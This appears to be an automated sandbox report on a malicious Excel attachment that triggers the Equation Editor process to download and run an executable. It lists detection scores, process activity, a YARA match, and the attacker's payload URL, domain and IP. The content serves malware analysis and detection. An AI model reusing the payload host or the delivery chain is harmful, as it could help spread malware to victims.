Source: PO906-645S790768.xlam.xlsx |
Avira: detected |
Source: http://plugsbreakers.top/voicxe/mynnft.exe |
Virustotal: Detection: 7% |
Perma Link |
Source: PO906-645S790768.xlam.xlsx |
ReversingLabs: Detection: 66% |
Source: PO906-645S790768.xlam.xlsx |
Virustotal: Detection: 47% |
Perma Link |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Network connect: IP: 66.63.187.171 Port: 80 |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_035904F5 WinExec,ExitProcess, |
1_2_035904F5 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03590429 LoadLibraryW,URLDownloadToFileW, |
1_2_03590429 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_035904AA URLDownloadToFileW, |
1_2_035904AA |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03590515 ExitProcess, |
1_2_03590515 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03590397 URLDownloadToFileW, |
1_2_03590397 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03590443 URLDownloadToFileW, |
1_2_03590443 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_0359037E ExitProcess, |
1_2_0359037E |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_035903B3 URLDownloadToFileW, |
1_2_035903B3 |
Source: global traffic |
DNS query: name: plugsbreakers.top |
Source: global traffic |
TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80 |
Source: global traffic |
TCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163 |
Source: global traffic |
TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80 |
Source: global traffic |
TCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163 |
Source: global traffic |
TCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163 |
Source: global traffic |
TCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163 |
Source: global traffic |
TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80 |
Source: global traffic |
TCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163 |
Source: global traffic |
TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80 |
Source: global traffic |
TCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163 |
Source: Joe Sandbox View |
ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS |
Source: global traffic |
HTTP traffic detected: GET /voicxe/mynnft.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: plugsbreakers.topConnection: Keep-Alive |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03590429 LoadLibraryW,URLDownloadToFileW, |
1_2_03590429 |
Source: global traffic |
HTTP traffic detected: GET /voicxe/mynnft.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: plugsbreakers.topConnection: Keep-Alive |
Source: global traffic |
DNS traffic detected: DNS query: plugsbreakers.top |
Source: EQNEDT32.EXE, 00000001.00000002.510778876.00000000002E3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://plugsbreakers.top/voicxe/mynnft.exeQHU |
Source: EQNEDT32.EXE, 00000001.00000002.510778876.00000000002E3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://plugsbreakers.top/voicxe/mynnft.exeiEHT2T |
Source: EQNEDT32.EXE, 00000001.00000002.510902224.0000000003590000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://plugsbreakers.top/voicxe/mynnft.exej |
Source: sheet1.xml, type: SAMPLE |
Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Memory allocated: 770B0000 page execute and read and write |
Jump to behavior |
Source: PO906-645S790768.xlam.xlsx |
OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false |
Source: sheet1.xml, type: SAMPLE |
Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing |
Source: classification engine |
Classification label: mal96.expl.winXLSX@2/2@1/1 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\Desktop\~$PO906-645S790768.xlam.xlsx |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Temp\CVR82F4.tmp |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File read: C:\Users\desktop.ini |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: PO906-645S790768.xlam.xlsx |
ReversingLabs: Detection: 66% |
Source: PO906-645S790768.xlam.xlsx |
Virustotal: Detection: 47% |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: wow64win.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: wow64cpu.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: msi.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: rpcrtremote.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dwmapi.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: webio.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: nlaapi.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: PO906-645S790768.xlam.xlsx |
Initial sample: OLE indicators vbamacros = False |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3376 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
API call chain: ExitProcess graph end node |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_0359051C mov edx, dword ptr fs:[00000030h] |
1_2_0359051C |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Jump to behavior |